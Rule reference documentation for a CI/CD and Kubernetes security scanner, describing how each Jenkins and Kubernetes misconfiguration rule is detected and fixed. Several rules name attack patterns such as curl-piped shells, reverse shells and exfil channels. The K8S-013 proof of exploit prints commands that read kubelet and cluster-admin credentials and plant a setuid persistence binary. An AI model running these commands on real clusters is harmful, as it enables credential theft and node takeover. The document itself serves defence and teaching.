Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a timeout() wrapper, the pipeline runs until the Jenkins controller's global timeout (or indefinitely if none is configured). Explicit timeouts cap blast radius and the window during which a compromised step has workspace access.

Recommendation. Wrap the pipeline body or individual stages with timeout(time: N, unit: 'MINUTES') { … }. Without an explicit timeout, the build runs until the Jenkins global default (or indefinitely).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-015 in the Jenkins provider.

JF-016: Remote script piped to shell interpreter HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a Jenkinsfile. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the build agent.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.

Source: JF-016 in the Jenkins provider.

JF-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a Jenkinsfile give the container full access to the build agent, enabling container escape and lateral movement.

Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-017 in the Jenkins provider.

JF-018: Package install from insecure source HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a Jenkinsfile. These patterns allow man-in-the-middle injection of malicious packages.

Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-018 in the Jenkins provider.

JF-019: Groovy sandbox escape pattern detected CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detects Groovy patterns that bypass the Jenkins script security sandbox: Runtime.getRuntime(), Class.forName(), .classLoader, ProcessBuilder, and @Grab. These give the pipeline (or an attacker who controls its source) unrestricted access to the Jenkins controller JVM, full RCE.

Recommendation. Remove direct Runtime/ClassLoader calls. Use Jenkins pipeline steps instead. Avoid @Grab for untrusted dependencies.

Source: JF-019 in the Jenkins provider.

JF-020: No vulnerability scanning step MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck. Comments are stripped before matching.

Recommendation. Add a vulnerability scanning step, trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.

Source: JF-020 in the Jenkins provider.

JF-021: Package install without lockfile enforcement MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.

Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-021 in the Jenkins provider.

JF-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.

Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR pipeline (e.g. Dependabot, Renovate).

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.

Source: JF-022 in the Jenkins provider.

JF-023: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.

Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: JF-023 in the Jenkins provider.

JF-024: input approval step missing submitter restriction MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. JF-005 already flags deploy stages with no input step. This rule catches the subtler case: the gate exists, but it doesn't actually restrict approvers. submitter accepts a comma-separated list of Jenkins usernames and group names; scope it to the smallest release-eligible pool.

Recommendation. Add a submitter: 'releasers,sre' (or a single role) argument to every input step in a deploy-like stage. Without it, any user with the Jenkins job Build permission can approve a production promotion, the approval gate becomes advisory.

Source: JF-024 in the Jenkins provider.

JF-025: Kubernetes agent pod template runs privileged or mounts hostPath HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. JF-017 flags inline docker run commands. This rule targets the other privileged-mode entry point: Jenkins' Kubernetes plugin lets pipelines declare agent { kubernetes { yaml '''...''' } }. A pod running with privileged: true or mounting hostPath: / gives the build container the same blast radius, container escape, node-credential theft, cross-tenant contamination on a shared cluster.

Recommendation. Remove privileged: true from the embedded pod YAML, drop hostPath/hostNetwork/hostPID/hostIPC entries, and add a securityContext with runAsNonRoot: true and a readOnlyRootFilesystem. If Docker-in-Docker is genuinely required, use a rootless daemon (e.g. sysbox) or run the build on a dedicated privileged pool with stricter branch protection.

Source: JF-025 in the Jenkins provider.

JF-026: build job: trigger ignores downstream failure MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. The Jenkins Pipeline plugin defaults wait to true and propagate to true, but either can be flipped per call. wait: false returns immediately; propagate: false continues even when the downstream job fails or is aborted. Both patterns sever the flow-control link between the upstream approval gate and the work the downstream job is about to do.

Recommendation. Remove wait: false and propagate: false from every build job: step, or replace them with an explicit currentBuild.result = build(...).result check. A fire-and-forget trigger can silently ship broken artifacts because the upstream job reports success regardless of what the downstream job actually did.

Source: JF-026 in the Jenkins provider.

JF-027: archiveArtifacts does not record a fingerprint LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Fingerprinting hashes the artifact on archive so Jenkins can trace its flow between jobs, the same mechanism JF-013 relies on for verification-step pairing. It's cheap and retroactive: enabling it on the producer job unlocks a build-traceability audit for every downstream consumer.

Recommendation. Set fingerprint: true on every archiveArtifacts call (or use archiveArtifacts artifacts: '...', fingerprint: true). Without it, Jenkins can't link the artifact to the build that produced it; copyArtifacts consumers downstream then have no provenance to verify against.

Source: JF-027 in the Jenkins provider.

JF-028: No SLSA provenance attestation produced MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. cosign sign signs the artifact bytes. cosign attest signs an in-toto statement describing how the build ran, builder, source commit, input parameters. SLSA L3 verifiers check the latter so consumers can enforce policy on where and how artifacts were produced.

Recommendation. Add a sh 'cosign attest --predicate=provenance.intoto.jsonl …' step after the build, or integrate the TestifySec witness run attestor. JF-006 covers signing; this rule covers the build-provenance statement SLSA Build L3 requires.

Source: JF-028 in the Jenkins provider.

JF-029: Jenkinsfile contains indicators of malicious activity CRITICAL

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Distinct from JF-016 (curl pipe) and JF-019 (Groovy sandbox escape). Those flag risky defaults; this flags concrete evidence, reverse shells, base64-decoded execution, miner binaries, exfil channels, credential-dump pipes, shell-history erasure. Runs on the comment-stripped Groovy text so // cosign verify … // webhook.site in a legitimate annotation doesn't false-positive.

Recommendation. Treat as a potential compromise. Identify the commit that introduced the matching stage(s), rotate Jenkins credentials the job can reach, review controller/agent audit logs for outbound traffic to the matched hosts, and re-image the agent pool if the compromise may have persisted.

Known false positives.

  • Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
  • Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.

Source: JF-029 in the Jenkins provider.

JF-030: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements JF-002 (script injection from untrusted build parameters). Fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the input source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate any value feeding a dynamic command at the boundary, or pass arguments as a list to a real sh step so the shell is not re-invoked.

Known false positives.

  • sh 'eval "$(ssh-agent -s)"' and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: JF-030 in the Jenkins provider.

JF-031: Package install bypasses registry integrity (git / path / tarball source) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements JF-021 (missing lockfile flag). Git URL installs without a commit pin, local-path installs, and direct tarball URLs bypass the registry integrity controls the lockfile relies on.

Recommendation. Pin git dependencies to a commit SHA. Publish private packages to an internal registry (Artifactory, Nexus) instead of installing from a filesystem path or tarball URL.

Source: JF-031 in the Jenkins provider.

JF-032: Agent label interpolates attacker-controllable value HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. JF-014 catches agent labels that aren't ephemeral; this rule catches the upstream targeting choice. When label inside an agent { ... } block is computed from a build parameter or an SCM-controlled environment variable, whoever queues the build (or pushes the branch / opens the PR) picks which agent the job lands on, including any privileged label the controller exposes. Two attacker surfaces are flagged: untrusted env.* refs (BRANCH_NAME, CHANGE_BRANCH, TAG_NAME, …) and params.X references (caller-controlled at trigger time). The rule walks all four agent { ... } shapes, direct label, the node { label … } form, and docker { label … } / dockerfile { label … }, via brace-balanced scan so nested DSL blocks parse correctly.

Recommendation. Hard-code agent labels to a specific pool name. If label selection has to be parameterised, validate the candidate value against an explicit allowlist before the build starts (Groovy if guard at the top of the pipeline), and never inline ${params.X} / ${env.BRANCH_NAME} / ${env.CHANGE_BRANCH} directly into label "...".

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Author-controlled environment refs like ${env.JOB_NAME} or ${env.BUILD_NUMBER} are intentionally not flagged, those values come from Jenkins itself, not from the triggerer. Pipelines that intentionally select agents via a vetted parameter and gate the assignment behind a Groovy validator should suppress with .pipelinecheckignore and a rationale rather than disable the rule everywhere.

Source: JF-032 in the Jenkins provider.

K8S-001: Container image not pinned by sha256 digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives.image_pinning.classify so the floating-tag semantics match DF-001 / GL-001 / JF-009 / ADO-009 / CC-003. Even a PINNED_TAG like nginx:1.25.4 is treated as unpinned, only an explicit @sha256: survives, since a tag is mutable on the registry side and Kubernetes will happily pull the new content on a node restart.

Recommendation. Resolve every workload container image to its current digest (crane digest <ref> or docker buildx imagetools inspect) and pin via image: repo@sha256:<digest>. Floating tags (:latest, :3, no tag) silently swap the running image on the next rollout, breaking provenance and reproducibility.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-001 in the Kubernetes provider.

K8S-002: Pod hostNetwork: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Compromised containers on hostNetwork can sniff or interfere with traffic from every other pod on the node. Reserve the flag for system DaemonSets that genuinely require it (CNI agents, ingress data planes); applications never need it.

Recommendation. Set spec.hostNetwork: false (the default) on every workload. hostNetwork: true puts the pod directly on the node's network namespace, exposing every host-bound listener to the container and bypassing CNI network policies.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-002 in the Kubernetes provider.

K8S-003: Pod hostPID: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. There is no application use case for hostPID. Only specialised node agents (process exporters, debuggers) legitimately need it, and those are typically deployed via a system DaemonSet with an explicit security review.

Recommendation. Set spec.hostPID: false (the default) on every workload. hostPID: true makes every host process visible inside the container, and combined with privileged execution allows trivial escape via nsenter / /proc/<pid>/root.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-003 in the Kubernetes provider.

K8S-004: Pod hostIPC: true HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Modern applications coordinate via gRPC / sockets, never via host IPC. Treat this flag as a strong red flag in code review unless paired with a documented system-level use case.

Recommendation. Set spec.hostIPC: false (the default) on every workload. hostIPC: true lets the container read and write the host's shared-memory segments and POSIX message queues, exposing data exchanged by every other process on the node.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-004 in the Kubernetes provider.

K8S-005: Container securityContext.privileged: true CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. privileged: true is the strongest possible escalation in Kubernetes. It overrides every other securityContext setting and is the single largest cluster-takeover vector after RBAC misconfiguration.

Recommendation. Remove securityContext.privileged: true from every container. A privileged container has full access to the host's devices and capabilities, escape to the node is trivial. If the workload genuinely needs a kernel capability, grant only that capability via capabilities.add rather than enabling privileged mode.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-005 in the Kubernetes provider.

K8S-006: Container allowPrivilegeEscalation not explicitly false HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. The default for non-root containers is True (Pod Security Standard 'baseline' allows this; 'restricted' does not). An explicit false is required because Kubernetes treats an unset field as a deferral to the cluster admission controller, which may not enforce restricted.

Recommendation. Set securityContext.allowPrivilegeEscalation: false on every container. The Linux no_new_privs flag stops setuid binaries and capabilities from gaining elevated privileges, without this, a compromised process can escape via setuid utilities still installed in many base images.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-006 in the Kubernetes provider.

K8S-007: Container runAsNonRoot not true / runAsUser is 0 HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A container is considered safe when EITHER its own securityContext OR the pod-level securityContext sets runAsNonRoot: true and a non-zero runAsUser. An explicit runAsUser: 0 always fails, even if runAsNonRoot is unset.

Recommendation. Set securityContext.runAsNonRoot: true and runAsUser: <non-zero UID> on every container, OR set the same fields at pod level so all containers inherit. Running as UID 0 inside a container makes container-escape exploits dramatically more dangerous, the attacker already has root inside the container, so any kernel CVE that matters becomes immediately exploitable.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-007 in the Kubernetes provider.

K8S-008: Container readOnlyRootFilesystem not true MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Many post-exploitation toolchains (cryptominers, persistence implants, shell-callbacks) assume a writable root. Locking it down forces the attacker to use distroless or runtime tmpfs they can't easily place.

Recommendation. Set securityContext.readOnlyRootFilesystem: true on every container. A read-only root filesystem stops attackers from dropping additional payloads into /tmp, /var, or writable system paths. Mount tmpfs emptyDir volumes for the directories the application genuinely needs to write to.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-008 in the Kubernetes provider.

K8S-009: Container capabilities not dropping ALL / adding dangerous caps HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Fails when the container does NOT drop ALL or when capabilities.add includes any of: SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, SYS_RAWIO, SYS_BOOT, BPF, PERFMON, or the literal ALL.

Recommendation. Drop every capability and add back only what the workload actually needs:

securityContext:
  capabilities:
    drop: ["ALL"]
    add: ["NET_BIND_SERVICE"]   # only if binding <1024

Most stateless services need no capabilities at all. Avoid SYS_ADMIN (effectively root), SYS_PTRACE (process snooping), NET_ADMIN (raw socket access), and SYS_MODULE (kernel module loading).

Source: K8S-009 in the Kubernetes provider.

K8S-010: Container seccompProfile not RuntimeDefault or Localhost MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod-level securityContext.seccompProfile covers all containers in the pod. Either path passes this rule. The default of Unconfined (or unset, which inherits the node default, usually Unconfined) fails.

Recommendation. Set securityContext.seccompProfile.type: RuntimeDefault (or Localhost with a path to your tuned profile) at either pod or container level. Without seccomp, every syscall is reachable from the container, modern kernel CVEs (e.g. io_uring) become trivially exploitable.

Source: K8S-010 in the Kubernetes provider.

K8S-011: Pod serviceAccountName unset or 'default' MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Both an unset serviceAccountName (which defaults to default) and an explicit serviceAccountName: default fail the rule. Pair this with K8S-012 to also disable token auto-mounting where the workload doesn't need API access.

Recommendation. Bind every workload to a dedicated, narrow ServiceAccount. The 'default' SA exists in every namespace and tends to accrete RoleBindings over time, using it gives the workload every privilege any other service in the namespace ever needed. Create a per-workload SA with the minimum RBAC needed and reference it via spec.serviceAccountName.

Source: K8S-011 in the Kubernetes provider.

K8S-012: Pod automountServiceAccountToken not false MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. An unset value defaults to True in Kubernetes. This rule fails on unset because most application workloads do NOT need API access and the default exposes credentials by accident. Workloads that explicitly call the API should set the field to true so the choice is visible in code review.

Recommendation. Set spec.automountServiceAccountToken: false on every workload that doesn't need to talk to the Kubernetes API. Auto-mounted SA tokens are a free credential for an attacker who lands a shell, without explicit opt-out the token sits at /var/run/secrets/kubernetes.io/serviceaccount/token ready to be exfiltrated. If the workload needs API access, leave it true but pair with a tight, dedicated RBAC role.

Source: K8S-012 in the Kubernetes provider.

K8S-013: Pod uses a hostPath volume HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Some legitimate system DaemonSets need hostPath (log collectors, CSI node plugins). Those should be deployed with explicit security review and a narrow path:; this rule fires regardless because application workloads should never use hostPath.

Recommendation. Replace hostPath volumes with configMap, secret, emptyDir, persistentVolumeClaim, or CSI volumes. hostPath opens a direct read/write window onto the node's filesystem; combined with even mild container compromise it gives the attacker access to other pods' data, kubelet credentials, and the container runtime.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • CVE-2021-25741 (Kubernetes subpath symlink escape): a container with hostPath plus subpath could traverse outside the volume boundary and read or modify arbitrary host files. Exploitable on any cluster permitting hostPath to non-system workloads.
  • TeamTNT / Kinsing crypto-jacking campaigns (2020-2022): cluster compromise reports repeatedly traced lateral movement from a single misconfigured pod to the underlying node via hostPath:/, then to kubelet credentials and other tenants. Sysdig and Aqua incident reports document the pattern.

Proof of exploit.

Vulnerable: pod mounts the host's root filesystem.

apiVersion: v1 kind: Pod metadata: name: attacker spec: containers: - name: shell image: busybox command: ["sleep", "infinity"] volumeMounts: - name: host-root mountPath: /host volumes: - name: host-root hostPath: path: / # full node filesystem

Attack from a shell inside the container:

# Read kubelet credentials and pivot to API server:

cat /host/var/lib/kubelet/kubeconfig

cat /host/etc/kubernetes/admin.conf

# Read service account tokens for every other pod on

# the node and impersonate them:

ls /host/var/lib/kubelet/pods//volumes/kubernetes.io~projected//token

# Drop a setuid binary and pin persistence on the host:

cp /bin/busybox /host/usr/local/bin/.bd

chmod 4755 /host/usr/local/bin/.bd

Safe: use scoped volume types that don't bridge to the host.

spec: volumes: - name: data persistentVolumeClaim: claimName: app-data

Source: K8S-013 in the Kubernetes provider.

K8S-014: Pod hostPath references a sensitive host directory CRITICAL

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Stricter than K8S-013: that rule flags any hostPath, this one upgrades to CRITICAL when the path is one of the well-known cluster-escape vectors.

Recommendation. Never mount the container runtime socket (/var/run/docker.sock, containerd.sock, crio.sock), kubelet credentials (/var/lib/kubelet), the cluster config (/etc/kubernetes), the host root (/), or /proc / /sys / /etc into a workload container. Each of these is a one-line cluster takeover. If a container genuinely needs node-level metrics, use an exporter DaemonSet with a narrowly-scoped read-only mount.

Source: K8S-014 in the Kubernetes provider.

K8S-015: Container missing resources.limits.memory MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Init containers and ephemeral containers are also checked: a leaking init container holds a slot on the node until it completes and can crowd out other pods just as readily as an application container.

Recommendation. Set resources.limits.memory on every container. Without a memory limit, a leaking or compromised container can consume the node's RAM until the kernel OOM-kills neighbouring pods, taking down workloads that share the node. Pair the limit with a requests.memory to inform the scheduler.

Source: K8S-015 in the Kubernetes provider.

K8S-016: Container missing resources.limits.cpu LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Lower severity than K8S-015 because CPU throttling is self-healing (workloads slow down rather than die) and some controllers (e.g. SchedulerProfile, LimitRange) supply a cluster-default cpu limit transparently.

Recommendation. Set resources.limits.cpu on every container. CPU throttling is the kernel's defense against a neighbour consuming all node cycles, without a limit, a compromised container can stall everything else on the node, including the kubelet. Pair the limit with a requests.cpu for scheduling.

Source: K8S-016 in the Kubernetes provider.

K8S-017: Container env value carries a credential-shaped literal CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS access keys outright, plus credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal. valueFrom entries are always safe (no inline value).

Recommendation. Replace literal env[].value entries that hold credentials with env[].valueFrom.secretKeyRef or envFrom.secretRef. A literal env value lives in the manifest YAML. It gets committed to git, surfaced by kubectl get pod -o yaml, and embedded in audit logs. Externalising into a Secret (and ideally a SealedSecret / ExternalSecret / SOPS-encrypted source) keeps the value out of the manifest.

Source: K8S-017 in the Kubernetes provider.

K8S-018: Secret stringData/data carries a credential-shaped literal CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Walks both stringData (plain text) and data (base64). Base64-encoded values are decoded and checked for AKIA-shaped AWS keys. Credential-shaped key NAMES with any non-empty value are flagged regardless of encoding, even if the value is the literal placeholder REPLACE_ME, having the name in the manifest is a maintenance footgun.

Recommendation. A Kind: Secret manifest committed to git defeats every secret-management story Kubernetes claims to provide, the base64 encoding in data is not encryption. Replace with SealedSecrets (Bitnami), ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection. If the manifest must remain in git, the only acceptable contents are placeholders that are filled in by an operator at apply time.

Source: K8S-018 in the Kubernetes provider.

K8S-019: Workload deployed in the 'default' namespace LOW

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Severity is LOW because in a well-curated cluster the default namespace is empty by policy. If your cluster treats default as a sandbox you can suppress this rule via .pipelinecheckignore.

Recommendation. Set metadata.namespace to a dedicated namespace per workload (or per environment). The default namespace tends to accumulate cluster-wide RoleBindings, NetworkPolicies, and operators that grant broader access than intended; placing application workloads there means every privilege grant in default applies to them. A purpose-built namespace also lets you enforce Pod Security Standards (pod-security.kubernetes.io/enforce label) scoped to that workload.

Source: K8S-019 in the Kubernetes provider.

K8S-020: ClusterRoleBinding grants cluster-admin or system:masters CRITICAL 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. The rule fires on a ClusterRoleBinding whose roleRef.name is cluster-admin, admin, or system:masters. Subject type does not matter, even binding cluster-admin to a Group is a cluster-takeover risk.

Recommendation. Replace cluster-admin / system:masters bindings with narrowly-scoped ClusterRoles or namespace-scoped Roles. Granting cluster-admin to a service account is equivalent to giving every pod that uses it root on every node, credential theft from any such pod becomes immediate cluster takeover. Audit-log every existing cluster-admin binding and replace each with the minimum verbs/resources the consumer actually needs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • Tesla Kubernetes dashboard compromise (RedLock, 2018): an unauthenticated Kubernetes dashboard exposed to the internet held tokens for service accounts bound to cluster-admin. Attackers used the dashboard credentials to deploy crypto-mining workloads with full cluster access. Least-privilege RBAC would have capped the blast radius even after dashboard exposure.
  • Argo CD CVE-2022-24348 / CVE-2022-24768 chain (2022): directory traversal plus a default cluster-admin install let any project member exfiltrate cluster-wide secrets. Argo's recommendation post-fix was to scope the controller's RBAC away from cluster-admin so a similar future bug couldn't escalate the same way.

Source: K8S-020 in the Kubernetes provider.

K8S-021: Role or ClusterRole grants wildcard verbs+resources HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. Fires on any rule entry where BOTH verbs and resources contain a literal "*". A wildcard in only one of the two is still risky but is often a legitimate read-everything pattern (e.g. monitoring); this rule targets the strict superset 'do anything to everything'.

Recommendation. Replace verbs: ["*"] and resources: ["*"] with explicit lists. Wildcards bypass the principle of least privilege: today they grant read pods and tomorrow they grant delete crds because a new resource was registered in that apiGroup. Explicit verbs (get, list, watch) and explicit resources (configmaps, services) keep grants stable across cluster upgrades.

Source: K8S-021 in the Kubernetes provider.

K8S-022: Service exposes SSH (port 22) MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Mirrors DF-013 (EXPOSE 22 in a Dockerfile) at the Service level. The check fires on Service ports whose port or targetPort is 22, regardless of Service type, a NodePort/LoadBalancer 22 is dramatically worse but a ClusterIP 22 still indicates an sshd container somewhere.

Recommendation. Containers should not run sshd. If you need an interactive shell into a running pod, use kubectl exec (subject to RBAC) or kubectl debug. Removing the port-22 Service removes a pre-auth network surface that's a frequent lateral-movement target after initial cluster compromise.

Source: K8S-022 in the Kubernetes provider.

K8S-023: Namespace missing Pod Security Admission enforcement label HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod Security Admission (PSA) replaced the deprecated PodSecurityPolicy in 1.25. The three levels are privileged, baseline, and restricted; baseline is a sensible production default and restricted matches the spirit of K8S-005..010. kube-system is exempt by convention since control-plane pods may legitimately need elevated permissions.

Recommendation. Set metadata.labels.pod-security.kubernetes.io/enforce to baseline or restricted on every Namespace. Without an enforce label the namespace runs the cluster's default policy, which on most installations is privileged and silently admits pods that violate every K8S-002..010 rule.

Known false positives.

  • Single-tenant clusters running only operator-managed workloads may apply PSA via an admission webhook instead. The label-based check can't see that.

Source: K8S-023 in the Kubernetes provider.

K8S-024: Container missing both livenessProbe and readinessProbe MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Init containers and ephemeral debug containers are exempt, neither makes sense to probe. Jobs and CronJobs are also exempt because Kubernetes treats them as one-shot work; completion is the lifecycle signal, not health.

Recommendation. Define at least one of livenessProbe or readinessProbe on every long-running container. Without probes, a wedged pod stays listed as Running and keeps receiving traffic, which masks incidents and amplifies the blast radius of a single faulty replica.

Source: K8S-024 in the Kubernetes provider.

